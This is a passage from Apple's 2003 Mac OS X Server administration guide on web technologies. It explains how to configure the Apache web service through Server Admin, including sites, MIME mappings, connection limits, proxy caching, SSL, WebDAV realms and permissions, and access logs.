feature makes updating content much easier, because you only revise information in
one place and the SSI command displays that revised information on many pages.
LL2350.book Page 8 Friday, August 22, 2003 2:32 PM
Chapter 1 Web Technologies Overview
9
Front-End Cache
The web server includes a high-performance cache that increases performance for
websites that serve static pages. The static content stays in the cache once used, so the
server can quickly retrieve this content when it is requested again.
Before You Begin
This section provides information you need to know before you set up your web server
for the first time. You should read this section even if you are an experienced web
administrator, as some features and behaviors may be different from what you expect.
Configuring Your Web Server
You can use Server Admin to set up and configure most features of your web server. If
you are an experienced Apache administrator and need to work with features of the
Apache web server that aren’t included in Server Admin, you can modify the
appropriate configuration files. However, Apple does not provide technical support for
modifying Apache configuration files. If you choose to modify a file, be sure to make a
backup copy first. Then you can revert to the copy should you have problems.
For more information about Apache modules, see the Apache Software Foundation
website at http://www.apache.org.
Providing Secure Transactions
If you want to provide secure transactions on your server, you should set up Secure
Sockets Layer (SSL) protection. SSL lets you send encrypted, authenticated information
across the Internet. If you want to allow credit card transactions through your website,
for example, you can use SSL to protect the information that’s passed to and from
your site.
For instructions on how to set up secure transactions, see Chapter 5, “Secure Sockets
Layer (SSL),” on page 45.
Setting Up Websites
Before you can host a website, you must:
• Register your domain name with a domain name authority
• Create a folder for your website on the server
• Create a default page in the folder for users to see when they connect
• Verify that DNS is properly configured if you want clients to access your website
by name
When you are ready to publish, or enable, your site, you can do this using Server
Admin. The Sites pane in the Settings window lets you add a new site and select a
variety of settings for each site you host.
See Chapter 3, “Managing Websites,” on page 23 for more information.
LL2350.book Page 9 Friday, August 22, 2003 2:32 PM
10
Chapter 1 Web Technologies Overview
Hosting More Than One Website
You can host more than one website simultaneously on your web server. Depending
on how you configure your sites, they may share the same domain name, IP address, or
port. The unique combination of domain name, IP address, and port identifies each
separate site. Your domain names must be registered with a domain name authority
such as InterNIC. Otherwise, the website associated with the domain won’t be visible
on the Internet. (There is a fee for each additional name you register.)
If you configure websites using multiple domain names and one IP address, older
browsers that do not support HTTP 1.1 or later (that don’t include the “Host” request
header), will not be able to access your sites. This is an issue only with software
released prior to 1997 and does not affect modern browsers. If you think your users will
be using very old browser software, you’ll need to configure your sites with one
domain name per IP address.
Understanding WebDAV
If you use WebDAV to provide live authoring on your website, you should create realms
and set access privileges for users. Each site you host can be divided into a number of
realms, each with its own set of users and groups that have either browsing or
authoring privileges.
Defining Realms
When you define a realm, which is typically a folder (or directory), the access privileges
you set for the realm apply to all the contents of that directory. If a new realm is
defined for one of the folders within the existing realm, only the new realm privileges
apply to that folder and its contents. For information about creating realms and setting
access privileges, see “Setting Access for WebDAV-Enabled Sites” on page 31.
Setting WebDAV Privileges
The Apache process running on the server needs to have access to the website’s files
and folders. To provide this access, Mac OS X Server installs a user named “www” and a
group named “www” in the server’s Users & Groups List. The Apache processes that
serve webpages run as the www user and as members of the www group. You need to
give the www group read access to files within websites so that the server can transfer
the files to browsers when users connect to the sites. If you’re using WebDAV, the www
user and www group both need write access to the files and folders in the websites. In
addition, the www user and group need write access to the /var/run/davlocks directory.
Understanding WebDAV Security
WebDAV lets users update files in a website while the site is running. When WebDAV is
enabled, the web server must have write access to the files and folders within the site
users are updating. This has significant security implications when other sites are
running on the server, because individuals responsible for one site may be able to
modify other sites.
LL2350.book Page 10 Friday, August 22, 2003 2:32 PM
Chapter 1 Web Technologies Overview
11
You can avoid this problem by carefully setting access privileges for the site files using
the Sharing module of the Workgroup Manager application. Mac OS X Server uses a
predefined group www, which contains the Apache processes. You need to give the
www group Read & Write access to files within the website. You also need to assign
these files Read & Write access by the website administrator (Owner) and No Access to
Everyone.
If you are concerned about website security, you may choose to leave WebDAV
disabled and use Apple file service or FTP service to modify the contents of a website
instead.
Understanding Multipurpose Internet Mail Extension
Multipurpose Internet Mail Extension (MIME) is an Internet standard for specifying what
happens when a web browser requests a file with certain characteristics. You can
choose the response you want the web server to make based on the file’s suffix. Your
choices will depend partly on what modules you have installed on your web server.
Each combination of a file suffix and its associated response is called a MIME type
mapping.
MIME Suffixes
A suffix describes the type of data in a file. Here are some examples:
• txt for text files
• cgi for Common Gateway Interface files
• gif for GIF (graphics) files
• php for PHP: Hypertext Preprocessor (embedded HTML scripts) used for
WebMail, and so on
• tiff for TIFF (graphics) files
Mac OS X Server includes a default set of MIME type suffixes. This set includes all the
suffixes in the mime.types file distributed with Apache, with a few additions. If a suffix
you need is not listed, or does not have the behavior you want, use Server Admin to
add the suffix to the set or to change its behavior.
Note: Do not add or change MIME suffixes by editing configuration files.
Web Server Responses (Content Handlers)
When a file is requested, the web server handles the file using the response specified
for the file’s suffix. Responses, also known as content handlers, can be either an action
or a MIME type. Possible responses include:
• Return file as MIME type (you enter the mapping you want to return)
• Send-as-is (send the file exactly as it exists)
• Cgi-script (run a CGI script you designate)
• Imap-file (generate an IMAP mail message)
• Mac-binary (download a compressed file in MacBinary format)
LL2350.book Page 11 Friday, August 22, 2003 2:32 PM
12
Chapter 1 Web Technologies Overview
MIME type mappings are divided into two subfields separated by a forward slash, such
as text/plain. Mac OS X Server includes a list of default MIME type mappings. You can
edit these and add others.
When you specify a MIME type as a response, the server identifies the type of data
requested and sends the response you specify. For example, if the browser requests a
file with the suffix “jpg,” and its associated MIME type mapping is image/jpeg, the
server knows it needs to send an image file and that its format is JPEG. The server
doesn’t have to do anything except serve the data requested.
Actions are handled differently. If you’ve mapped an action to a suffix, your server runs
a program or script, and the result is served to the requesting browser. For example, if a
browser requests a file with the suffix “cgi,” and its associated response is the action
cgi-script, your server runs the script and returns the resulting data to the requesting
browser.
LL2350.book Page 12 Friday, August 22, 2003 2:32 PM
2
13
2 Managing Web Technologies
Use Server Admin to set up web technologies initially
and to manage web settings and components.
If you are familiar with web servers and their content, you can use these summary
steps to get your web server started. If you’d like more detailed instructions for these
tasks, see the similar topics in “Using Server Admin to Manage Your Web Server” on
page 15 and Chapter 3, “Managing Websites,” on page 23.
Setting Up Your Web Server for the First Time
Step 1: Set up the Documents folder
When your server software is installed, a folder named Documents is set up
automatically in the WebServer directory. Put any items you want to make available
through a website in the Documents folder. You can create folders within the
Documents folder to organize the information. The folder is located in the directory
/Library/WebServer/Documents.
In addition, each registered user has a Sites folder in the user’s own home directory.
Any graphics or HTML pages stored in the user’s Sites folder will be served from the
URL server.example.com/~username/.
Step 2: Create a default page
Whenever users connect to your website, they see the default page. When you first
install the software, the file index.html in the Documents folder is the default page.
You’ll need to replace this file with the first page of your website and name it
index.html. If you want to call the file something else, make sure you add that name to
the list of default index files and move its name to the top of the list in the General
pane of the site settings window of Server Admin. See “Setting the Default Page for a
Website” on page 25 for instructions on specifying default index file names.
For more information about all website settings, see Chapter 3, “Managing Websites,”
on page 23.
LL2350.book Page 13 Friday, August 22, 2003 2:32 PM
14
Chapter 2 Managing Web Technologies
Step 3: Assign privileges for your website
The Apache processes that serve webpages must have read access to the files, and
read/execute access to the folders. (In the case of folders, execute access means the
ability to read the names of files and folders contained in that particular folder.) Those
apache processes run as user www—a special user created specifically for Apache
when Mac OS X Server is installed. The user www is a member of the group www. So
for the Apache process to access the content of the website, the files and folders need
to be readable by user www.
Consequently, you need to give the www group at least read-only access to files within
your website so that it can transfer those files to browsers when users connect to the
site. You can do this by:
• Making the files and folders readable by everyone regardless of their user or group
ownership
• Making www the owner of files and folders and making sure that the files and folders
are readable by the owner
• Making the group www the owner of the files and folders and making sure that the
files and folders are readable by the group
For information about assigning privileges, see the file services administration guide.
Step 4: Configure your web server
The default configuration works for most web servers that host a single website, but
you can configure all the basic features of web service and websites using Server
Admin. For more advanced configuration options, see Chapter 6, “Working With Open-
Source Applications,” on page 49.
To host user websites, you must configure at least one website.
To configure a site:
1 Open Server Admin.
2 Click Web in the list for the server you want.
3 Click Settings in the button bar.
4 In the Sites pane, click the Enabled button for the site you want to turn on.
5 Double-click the site name and choose the configuration options you want for the site.
For information about these settings, see “Using Server Admin to Manage Your Web
Server” on page 15 and Chapter 3, “Managing Websites,” on page 23.
LL2350.book Page 14 Friday, August 22, 2003 2:32 PM
Chapter 2 Managing Web Technologies
15
Step 5: Start web service
1 Open Server Admin and click Web in the list below the server name.
2 Click Start Service in the toolbar.
Important: Always use Server Admin to start and stop the web server. You can start the
web server from the command line, but Server Admin won’t show the change in status
for several seconds. Server Admin is the preferred method to start and stop the web
server and modify web server settings.
Step 6: Connect to your website
To make sure the website is working properly, open your browser and try to connect to
your website over the Internet. If your site isn’t working correctly, see Chapter 8,
“Solving Problems,” on page 65.
Using Server Admin to Manage Your Web Server
The Server Admin application lets you set and modify most options for your web
server.
To access the web settings window:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
Note: Click one of the five buttons at the top to see the settings in that pane.
3 Make the changes you want in settings.
4 Click Save.
The server restarts when you save your changes.
Starting or Stopping Web Service
You start and stop web service from the Server Admin application.
To start or stop web service:
1 In Server Admin, click Web in the list for the server you want.
2 Click Start Service or Stop Service in the toolbar.
If you stop web service, users connected to any website hosted on your server are
disconnected immediately.
Important: Always use Server Admin to start and stop the web server. You can start the
web server from the command line, but Server Admin won’t show the change in status
for several seconds. Server Admin is the preferred method to start and stop the web
server and modify web server settings.
LL2350.book Page 15 Friday, August 22, 2003 2:32 PM
16
Chapter 2 Managing Web Technologies
Starting Web Service Automatically
Web service is set to start automatically (if it was running at shutdown) when the
server starts up. This will ensure that your websites are available if there’s been a power
failure or the server shuts down for any reason.
When you start web service in the Server Admin toolbar, the service starts
automatically each time the server restarts. If you turn off web service and then restart
the server, you must turn web service on again.
Modifying MIME Mappings and Content Handlers
Multipurpose Internet Mail Extension (MIME) is an Internet standard for describing the
contents of a file. The MIME Types pane lets you set up how your web server responds
when a browser requests certain file types. For more information about MIME types
and MIME type mappings, see “Understanding Multipurpose Internet Mail Extension”
on page 11.
Content handlers are Java programs used to manage different MIME type-subtype
combinations, such as text/plain and text/richtext.
The server includes the MIME type in its response to a browser to describe the
information being sent. The browser can then use its list of MIME preferences to
determine how to handle the information.
The server’s default MIME type is text/html, which specifies that a file contains HTML
text.
The web server is set up to handle the most common MIME types and content
handlers. You can add, edit, or delete MIME type and content handler mappings. In the
Server Admin application, these files are displayed in two lists: MIME Types and
Content Handlers. You can edit items in each list and add or delete items in either list.
To add or modify a MIME type or content handler mapping:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the MIME Types pane, click the Add button below the appropriate list to add a new
mapping, or select a mapping and click the Delete or Edit button. (If you choose
Delete, you’ve finished.)
LL2350.book Page 16 Friday, August 22, 2003 2:32 PM
Chapter 2 Managing Web Technologies
17
4 In the new sheet that appears, do one of the following:
• For a new MIME type, type each part of the name (separated by a slash), select the
suffix and type its name, use the Add button to add any suffixes you want, then click
OK.
• For a new content handler, type a name for the handler, select the suffix and type its
name, use the Add button to add any suffixes you want, then click OK.
• To edit a MIME type or content handler, change its name as desired, select the suffix
and change it as desired, add any suffixes you want using the Add button, then click
OK.
5 Click Save.
If you add or edit a handler that has Common Gateway Interface (CGI) script, make sure
you have enabled CGI execution for your site in the Options pane of the Settings/Sites
window.
Managing Connections
You can limit the period of time that users are connected to the server. In addition, you
can specify the number of connections to websites on the server at any one time.
Setting Simultaneous Connections for the Web Server
You can specify the number of simultaneous connections to your web server. When the
maximum number of connections is reached, new requests receive a message that the
server is busy.
Simultaneous connections are concurrent HTTP client connections. Browsers often
request several parts of a webpage at the same time, and each of those requests is a
connection. So a high number of simultaneous connections can be reached if the site
has pages with multiple elements and many users are trying to reach the server at
once.
To set the maximum number of connections to your web server:
1 In Server Admin, click Web for the server you want.
2 Click Settings in the button bar.
3 In the General pane, enter a number in the “Maximum simultaneous connections” field.
The range for maximum simultaneous connections is 1 to 2048. The default maximum
is 500, but you can set the number higher or lower, taking into consideration the
desired performance of your server.
4 Click Save.
Web service restarts.
LL2350.book Page 17 Friday, August 22, 2003 2:32 PM
18
Chapter 2 Managing Web Technologies
Setting Persistent Connections for the Web Server
You can set up your web server to respond to multiple requests from a client computer
without closing the connection each time. Repeatedly opening and closing
connections isn’t very efficient and decreases performance.
Most browsers request a persistent connection from the server, and the server keeps
the connection open until the browser closes the connection. This means the browser
is using a connection even when no information is being transferred. You can allow
more persistent connections—and avoid sending a Server Busy message to other
users—by increasing the number of persistent connections allowed.
To set the number of persistent connections:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the General pane, enter a number in the “Maximum persistent connections” field and
type a new number.
The range for maximum persistent connections is 1 to 2048. The default setting of 500
provides better performance.
4 Click Save.
Web service restarts.
Setting a Connection Timeout Interval
You can specify a time period after which the server will drop a connection that is
inactive.
To set the connection timeout interval:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the General pane, enter a number in the “Connection timeout” field to specify the
amount of time that can pass between requests before the session is disconnected by
the web server.
The range for connection timeout is 0 to 9999 seconds.
4 Click Save.
Web service restarts.
LL2350.book Page 18 Friday, August 22, 2003 2:32 PM
Chapter 2 Managing Web Technologies
19
Setting Up Proxy Caching
A proxy lets users check a local server for frequently used files. You can use a proxy to
speed up response times and reduce network traffic. The proxy stores recently accessed
files in a cache on your web server. Browsers on your network check the cache before
retrieving files from more distant servers.
To take advantage of this feature, client computers must specify your web server as
their proxy server in their browser preferences.
If you want to set up a web proxy, make sure you create and enable a website for the
proxy. You may wish to disable logging on the proxy site, or configure the site to record
its access log in a separate file from your other sites' access logs. The site does not have
to be on port 80, but setting up web clients is easier if it is because browsers use port
80 by default.
To set up a proxy:
1 In Server Admin, click Web for the server you want.
2 Click Settings in the button bar.
3 In the Proxy pane, click Enable Proxy.
4 Set the maximum cache size.
When the cache reaches this size, the oldest files are deleted from the cache folder.
5 Type the pathname for the cache folder in the “Cache folder” field.
You can also click the Browse button and browse for the folder you want to use.
If you are administering a remote server, file service must be running on the remote
server to use the Browse button.
If you change the folder location from the default, you will have to select the new
folder in the Finder, choose File > Get Info, and change the owner and group to www.
6 Click Save.
Web service restarts.
Note: If proxy is enabled, any site on the server can be used as the proxy.
LL2350.book Page 19 Friday, August 22, 2003 2:32 PM
20
Chapter 2 Managing Web Technologies
Blocking Websites From Your Web Server Cache
If your web server is set up to act as a proxy, you can prevent the server from caching
objectionable websites.
Important: To take advantage of this feature, client computers must specify your web
server as their proxy server in their browser preferences.
You can import a list of websites by dragging it to list of sites. The list must be a text file
with the host names separated by commas or tabs (also known as csv and tsv strings).
Make sure that the last entry in the file is terminated with a carriage return/line feed, or
it will be overlooked.
To block websites:
1 In Server Admin, click Web for the server you want.
2 Click Settings in the button bar.
3 In the Proxy pane, click Enable Proxy.
4 Do one of the following:
• Click the Add button, type the URL of the website you want to block in the Add field,
and click Add.
• Drag a list of websites (text file in comma-separated or tab-separated format) to the
“Blocked hosts” field.
5 Click Save.
Web service restarts.
Using Secure Sockets Layer (SSL)
Secure Sockets Layer (SSL) provides security for a site and for its users by
authenticating the server, encrypting information, and maintaining message integrity.
About SSL
SSL was developed by Netscape and uses authentication and encryption technology
from RAS Data Security, Inc. For detailed information about the SSL protocol, see:
• www.netscape.com/eng/ssl3/draft302.txt
• http://developer.netscape.com/misc/developer/conference/proceedings/cs2/
index.html
The SSL protocol is on a layer below application protocols (HTTP, for example) and
above TCP/IP. This means that when SSL is operating in the server and the client’s
software, all information is encrypted before being sent.
The Apache web server in Mac OS X Server supports SSLv2, SSLv3, and TLSv1. More
information about these protocol versions is available at www.modssl.org.
LL2350.book Page 20 Friday, August 22, 2003 2:32 PM
Chapter 2 Managing Web Technologies
21
The Apache server in Mac OS X Server uses a public key-private key combination to
protect information. A browser encrypts information using a public key provided by
the server. Only the server has a private key that can decrypt that information.
When SSL is implemented on a server, a browser connects to it using the https prefix in
the URL, rather than http. The “s” indicates that the server is secure.
When a browser initiates a connection to an SSL-protected server, it connects to a
specific port (443) and sends a message that describes the encryption ciphers it
recognizes. The server responds with its strongest cipher, and the browser and server
then continue exchanging messages until the server determines the strongest cipher
both it and the browser recognize. Then the server sends its certificate (the Apache
web server uses an ISO X.509 certificate) to the browser; this certificate identifies the
server and uses it to create an encryption key for the browser to use. At this point a
secure connection has been established and the browser and server can exchange
encrypted information.
Using WebDAV
Web-based Distributed Authoring and Versioning (WebDAV) allows you or your users to
make changes to websites while the sites are running. You enable WebDAV for
individual sites, and you also need to assign access privileges for the sites and for the
web folders. See “Enabling WebDAV on Websites” on page 30 for details.
Using Tomcat
Tomcat adds Java servlet and JavaServer Pages (JSP) capabilities to Mac OS X Server.
Java servlets are Java-based applications that run on your server, in contrast to Java
applets, which run on the user’s computer. JavaServer Pages allows you to embed Java
servlets in your HTML pages.
You can set Tomcat to start automatically whenever the server starts up. This will
ensure that the Tomcat module starts up after a power failure or after the server shuts
down for any reason.
You can use Server Admin or the command-line tool to enable the Tomcat module. See
“Tomcat” on page 58 for more information about Tomcat and how to use it with your
web server.
LL2350.book Page 21 Friday, August 22, 2003 2:32 PM
22
Chapter 2 Managing Web Technologies
Viewing Web Service Status
In Server Admin you can check the current state of the Apache server and which server
modules are active.
Web Service Overview
The overview in Server Admin shows server activity in summary form.
To view web service status overview:
1 Open Server Admin.
2 Click Overview in the button bar.
The Start/Stop Status Messages field displays a summary of server activity and the
server’s start date and time.
You can also view activity logs for each site on your server. See “Viewing Website
Settings” on page 34 for more information.
Web Service Modules in Use
You can view a list of modules in use on the server as well as modules that are available
but not in use.
To see which modules are enabled:
1 In Server Admin, click Web in the list for the server your want.
2 Click Settings in the button bar.
3 In the Modules pane, scroll to see the entire set of modules in use or available for use in
the server.
Viewing Logs of Web Service Activity
Web service in Mac OS X Server uses the standard Apache log format, so you can also
use any third-party log analysis tool to interpret the log data.
To view the log files:
1 In Server Admin, click Web in the list for the server you want.
2 Click Logs in the button bar.
3 Select the log you want to view in the list.
You can enable an access log and an error log for each site on the server. See “Enabling
Access and Error Logs for a Website” on page 27 for more information.
LL2350.book Page 22 Friday, August 22, 2003 2:32 PM
3
23
3 Managing Websites
Use the Server Admin application to set up and manage
the essential components of web service.
You administer websites on your server with Server Admin, an application that allows
you to establish settings, specify folders and paths, enable a variety of options, and
view the status of sites.
Using Server Admin to Manage Websites
The Sites pane in Server Admin lists your websites and provides some basic information
about each site. You use the Sites pane to add new sites or change settings for existing
sites.
To access the Sites pane:
m In Server Admin, click Web in the list for the server you want, click Settings in the
button bar, then click Sites.
The pane shows a list of sites on the server.
m To edit a site, double-click the site name.
Setting Up the Documents Folder for a Website
To make files available through a website, you put the files in the Documents folder for
the site. To organize the information, you can create folders inside the Documents
folder. The folder is located in the directory /Library/WebServer/Documents/.
In addition, each registered user has a Sites folder in the user’s own home directory.
Any graphics or HTML pages stored here will be served from the URL:
http://server.example.com/~username/.
LL2350.book Page 23 Friday, August 22, 2003 2:32 PM
24
Chapter 3 Managing Websites
To set up the Documents folder for your website:
1 Open the Documents folder on your web server.
If you have not changed the location of the Documents folder, it’s in this directory:
/Library/WebServer/Documents/.
2 Replace the index.html file with the main page for your website.
Make sure the name of your main page matches the default document name you set in
the General pane of the site’s Settings window. See “Setting the Default Page for a
Website” on page 25 for details.
3 Copy files you want to be available on your website to the Documents folder.
Enabling a Website on a Server
Before you can enable a website, you must create the content for the site and set up
your site folders.
To enable the website:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, click the Add button to add a new site or click the Enabled button for
the site in the list that you want to enable. (If the site is already listed, you’re finished.)
4 In the General pane, type the fully qualified DNS name of your website in the Name
field.
5 Enter the IP address and port number (any number up to 8999) for the site.
The default port number is 80. Make sure that the number you choose is not already in
use by another service on the server.
Important: In order to enable your website on the server, the website must have a
unique name, IP address, and port number combination. See “Hosting More Than One
Website” on page 10 for more information.
6 Enter the path to the folder you set up for this website.
You can also click the Browse button and browse for the folder you want to use.
7 Enter the file name of your default document (the first page users see when they
access your site).
8 Make any other settings you want for this site, then click Save.
9 Click the back button at the top right side of the editing window.
10 Click the Enabled box next to the site name in the Sites pane.
11 Click Save.
Web service restarts.
LL2350.book Page 24 Friday, August 22, 2003 2:32 PM
Chapter 3 Managing Websites
25
Changing the Default Web Folder for a Site
A site’s default web folder is used as the root for the site. In other words, the default
folder is the top level of the directory structure for the site.
To change the default web folder for a site hosted on your server:
1 Log in to the server you want to administer.
2 Drag the contents of your previous web folder to your new web folder.
3 In Server Admin, click Web in the list for the server where the website is located.
4 Click Settings in the button bar.
5 In the Sites pane, double-click the site in the list.
6 Type the path to the web folder in the Web Folder field, or click the Browse button and
navigate to the new web folder location (if accessing this server remotely, file service
must be turned on to do this; see the file services administration guide for more
information).
7 Click Save.
Web service restarts.
Setting the Default Page for a Website
The default page appears when a user connects to your website by specifying a
directory or host name instead of a file name.
You can have more than one default page (called a default index file in Server Admin)
for a site. If multiple index files are listed for a site, the web server displays the one
highest in the list that is in the site’s folder.
To set the default webpage:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the General pane, click the Add button and type a name in the “Default index files”
field. (Do not use any spaces in the name.)
A file with this name must be in the website folder.
5 To set the file as the one the server displays as its default page, drag that file to the top
of the list.
6 Click Save.
Web service restarts.
Note: If you plan to use only one index page for a site, you can leave index.html as the
default index file and change the content of the existing file with that name in /Library/
WebServer/Documents.
LL2350.book Page 25 Friday, August 22, 2003 2:32 PM
26
Chapter 3 Managing Websites
Changing the Access Port for a Website
By default, the server uses port 80 for connections to websites on your server. You may
need to change the port used for an individual website, for instance, if you want to set
up a streaming server on port 80. Make sure that the number you choose does not
conflict with ports already being used on the server (for FTP, Apple File Service, SMTP,
and others). If you change the port number for a website you must change all URLs
that point to the web server to include the new port number you choose.
To set the port for a website:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the General pane, type the port number in the Port field.
5 Click Save.
Web service restarts.
Improving Performance of Static Websites
(Performance Cache)
If your websites contain static HTML files, and you expect high usage of the pages, you
can enable the performance cache to improve server performance. The performance
cache is enabled by default.
You should disable the performance cache if:
• You do not anticipate heavy usage of your website.
• Most of the pages on your website are generated dynamically.
Understanding the Effect of Using a Web Service
Performance Cache
Web service's performance cache is enabled by default and significantly improves
performance for most websites. Sites that benefit most from the performance cache
contain mostly static content and can fit entirely in RAM. Website content is cached in
system RAM and is accessed very quickly in response to client requests.
Enabling the performance cache does not always improve performance. For example,
when the amount of static web content exceeds the physical RAM of your server, using
a performance cache increases memory swapping, which degrades performance.
Also note that when your server is running other services that compete for physical
RAM, such as AFP, the web performance cache may be less effective or may impact the
performance of those other services.
LL2350.book Page 26 Friday, August 22, 2003 2:32 PM
Chapter 3 Managing Websites
27
To enable or disable the performance cache for your web server:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the Options pane, click Performance Cache to change its state.
5 Click Save.
Web service restarts.
You can also improve server performance by disabling the access log.
Enabling Access and Error Logs for a Website
You can set up error and access logs for individual websites that you host on your
server. However, enabling the logs can slow server performance.
To enable access and error logs for a website:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the Logging pane, check Enable Access Log to enable this log.
5 Set how often you want the logs to be archived by clicking the checkbox and typing a
number of days.
6 Type the path to the folder where you want to store the logs.
You can also click the Browse button to locate the folder you want to use.
If you are administering a remote server, file service must be running on the remote
server to use the Browse button.
7 Choose a log format from the Format pop-up menu.
8 Edit the format string, if necessary.
9 Enter archive, location, and level choices for the error log as desired.
10 Click Save.
Web service restarts.
LL2350.book Page 27 Friday, August 22, 2003 2:32 PM
28
Chapter 3 Managing Websites
Understanding the New Web Service access_log Format
In version 10.3 of Mac OS X Server, the web performance cache does not prevent a
remote client's IP address from being logged in the access_log. The web performance
cache process now adds an HTTP header named “PC-Remote-Addr” that contains the
client's IP address before passing a request to the Apache web server.
With the performance cache disabled, the standard log format string on the
CustomLog directive in httpd.conf remains the same as in earlier versions:
%h %l %u %t "%r" %>s %b
When the performance cache is enabled (default) the “%h” item will extract the local
machine's IP address. To extract the remote client's IP address, the log format string
needs to be modified as follows:
%{PC-Remote-Addr}i %l %u %t "%r" %>s %b
When you use the Server Admin application to enable and disable web performance
cache for each site (virtual host), the CustomLog directive in httpd.conf for each site is
adjusted automatically so your access logs should always contain the correct remote
client address.
Setting Up Directory Listing for a Website
When users specify the URL for a directory, you can display either a default webpage
(such as index.html) or a list of the directory contents. You can display a folder list. To
set up directory listing, you need to enable indexing for the website.
Note: Folder listings are displayed only if no default document is found.
To enable indexing for a website:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the Options pane, select Folder Listing.
5 Click Save.
Web service restarts.
LL2350.book Page 28 Friday, August 22, 2003 2:32 PM
Chapter 3 Managing Websites
29
Creating Indexes for Searching Website Content
Version 10.3 of Mac OS X Server continues to support the mod_sherlock_apple Apache
module, which allows web browsers to search the content of your website. As in
previous versions of the server, you must produce a content index before content
searching is possible.
Content indexes in earlier server versions had to be created in Sherlock. Now, you can
create content indexes using the Finder. Select the folder containing the files you want
to index, then choose File > GetInfo. Click Content Index, then click Index Now. (You
can remove an index by using the Delete Index button in the Info window.)
In addition, there are new constraints that restrict the creation of index files. To create
an index, you must be the owner of the folder and must own any files in that folder
that are to be indexed. In the case of content in the /Library/WebServer/Documents
folder, the folder and all the files within it are owned by root. Even though the folder
and files are writable by members of the admin group, you must still be logged in as
root to create a content index.
Creating an index remotely or on a headless server is done using a command-line tool
named indexfolder. See the man pages for usage details. The operation of indexfolder
is affected by the login window. If nobody is logged in at the login window, the tool
must be run as root. If an administrator is logged in at the login window, the tool must
be run as that administrator. Otherwise, the tool will fail with messages similar to these:
kCGErrorIllegalArgument : initCGDisplayState: cannot map display interlocks.
kCGErrorIllegalArgument : CGSNewConnection cannot get connection port.
Whether done from the Finder or the indexfolder tool, content indexing creates a
folder named “.FBCIndex” either in the folder to be indexed or in one of its parent
folders.
Connecting to Your Website
Once you configure your website, it’s a good idea to view the site with a web browser
to verify that everything appears as intended.
To make sure a website is working properly:
1 Open a web browser and type the web address of your server.
You can use either the IP address or the DNS name of the server.
2 Type the port number, if you are not using the default port.
3 If you’ve restricted access to specific users, enter a valid user name and password.
LL2350.book Page 29 Friday, August 22, 2003 2:32 PM
30
Chapter 3 Managing Websites
Enabling WebDAV on Websites
Web-based Distributed Authoring and Versioning (WebDAV) allows you or your users
to make changes to websites while the sites are running. If you enable WebDAV, you
also need to assign access privileges for the sites and for the web folders.
To enable WebDAV for a site:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the Options pane, select WebDAV and click Save.
5 Click Realms. Double-click a realm to edit it, or click the Add button to create a new
realm.
The realm is the part of the website users can access.
6 Type the name you want users to see when they log in.
The default realm name is “untitled.”
7 If you want digest authentication for the realm, choose Digest from the Authorization
pop-up menu.
Basic authorization is on by default.
8 Type the path to the location in the website to which you want to limit access, and
click OK.
You can also click the Browse button to locate the folder you want to use.
If you are administering a remote server, file service must be running on the remote
server to use the Browse button.
9 Click Save.
Web service restarts.
Note: If you have turned off the WebDAV modules in the Modules pane of Server
Admin, you must turn it on again before WebDAV takes effect for a site. This is true
even if the WebDAV option is checked in the Options pane for the site. See “Apache
Modules” on page 61 for more about enabling modules.
LL2350.book Page 30 Friday, August 22, 2003 2:32 PM
Chapter 3 Managing Websites
31
Setting Access for WebDAV-Enabled Sites
You create realms to provide security for websites. Realms are locations within a site
that users can view or make changes to when WebDAV is enabled. When you define a
realm, you can assign browsing and authoring privileges to users of the realm.
To add users and groups to a realm:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the Realms pane, select the realm you want to edit.
If no realm names are listed, create one using the instructions in “Enabling WebDAV on
Websites” on page 30.
5 To set access for all users, do one of the following:
• If you want all users to browse or author, or both, select Can Browse or Can Author
for Everyone.
When you select privileges for Everyone, you have these options:
Browse allows everyone who can access this realm to see it. You can add additional
users and groups to the User or Group list to enable authoring for them.
Browse and Author together allow everyone who has access to this realm to see and
make changes to it.
• If you want to assign access to specific users (and not to all users), do not select Can
Browse or Can Author for Everyone.
6 To specify access for individual users and groups, click Users & Groups to open a drawer
listing users and groups.
7 Click Users or Groups in the drawer’s button bar to show the list you want.
8 Drag user names to the Users field or group names to the Groups field.
Note: You can also use the add (+) button to open a sheet in which you type a user or
group name and select access options.
9 Select Can Browse and Can Author for each user and group as desired.
10 Click Save.
Web service restarts.
Use the Realms pane to delete a user or group by selecting the name and clicking the
Delete (–) button.
LL2350.book Page 31 Friday, August 22, 2003 2:32 PM
32
Chapter 3 Managing Websites
WebDAV and Web Content File and Folder Permissions
Mac OS X Server imposes the following constraints on web content files and folders
(which are located by default in /Library/WebServer/Documents):
• For security reasons, web content files and folders should not be writable by world.
• Web content files and folders are owned by user root and group admin by default, so
they are modifiable by any administrator but not by user or group www.
• To use WebDAV, web content files must be readable and writable by user or group
www, and folders must be readable, writable, and executable by user or group www.
• If you need to modify web content files and folders while you are logged in as an
administrator, those files or folders need to be modifiable by the administrator.
If you want to use WebDAV, you need to enable it in Server Admin and manually
change the web content files’ or folders’ ownership to user and group www. If you are
using WebDAV and you want to make changes to web content files or folders while
logged in as an administrator, you need to change the web content file and folder
permissions to admin, make your edits, and then restore the file and folder permissions
to www.
To add sites to your web server while using WebDAV:
1 Change the group privileges of the folder containing your websites to admin (default
folder location is: /Library/Webserver/Documents).
2 Add your new site folder.
3 Change the group privileges of the folder containing your websites back to www.
Enabling Integrated WebDAV Digest Authentication
You can enable digest authentication for WebDAV realms in the Realms pane of Server
Admin. See “Setting Access for WebDAV-Enabled Sites” on page 31 for more
